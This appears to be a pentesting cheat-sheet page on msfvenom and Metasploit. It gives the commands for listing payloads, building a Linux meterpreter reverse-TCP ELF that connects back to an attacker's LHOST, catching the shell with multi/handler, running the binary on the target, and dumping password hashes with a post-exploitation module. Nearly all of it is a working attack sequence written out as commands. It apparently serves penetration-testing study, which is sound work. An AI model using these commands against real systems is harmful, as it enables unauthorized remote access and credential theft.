Msfvenom

Help menu

$ msfvenom -h

List available options for module type

$ msfvenom -l payloads
$ msfvenom -l encoders
$ msfvenom -l nops
$ msfvenom -l all

Payload option

$ msfvenom -p ...

# eg. 
$ msfvenom -p linux/x86/shell_reverse_tcp

Format option

$ msfvenom -f ...

# eg.
$ msfvenom -f elf
$ msfvenom -f exe

Note: The output from msfvenom provides the shellcode (typically written in assembly language) that can be executed on the target architecture; defined by the -pflag. The -f flag simply specifies the format for which the shellcode should be in.

Eg. Powershell

[Byte[]] $buf = 0xfc,0x48,0x83,...

Eg. C

unsigned char buf[] = "\xfc\x48\x83...

Eg. Python

buf = b""

buf += b"\xfc\x48\x8

buf += b"\...

A script/program (in the specific language) which executes the shellcode provided by msfvenom is still required to be created.

Example

linux/x86/meterpreter/reverse_tcp

$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.xxx.xxx LPORT=8000 -f elf > shell.elf

Module to use on the attacking machine to catch a shell

exploit/multi/handler

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost xxx.xxx.xxx.xxx
msf6 exploit(multi/handler) > set lport xxxx
msf6 exploit(multi/handler) > run

Run the shellcode on the target machine

# eg.
$ sudo ./shell.elf

Gain meterpreter shell on the attacker machine

meterpreter >

Using post exploitation hash dump module 

meterpreter > background
msf6 exploit(multi/handler) > sessions -l 

Active sessions
===============

  Id  Name  Type                  Information            Connection
  --  ----  ----                  -----------            ----------
  1         meterpreter x86/linux  ...                    ...

msf6 exploit(multi/handler) > use post/linux/gather/hashdump
msf6 post(linux/gather/hashdump) > show options
msf6 post(linux/gather/hashdump) > set session 1
msf6 post(linux/gather/hashdump) > run
...
PreviousMetasploitNextIntroduction

Last updated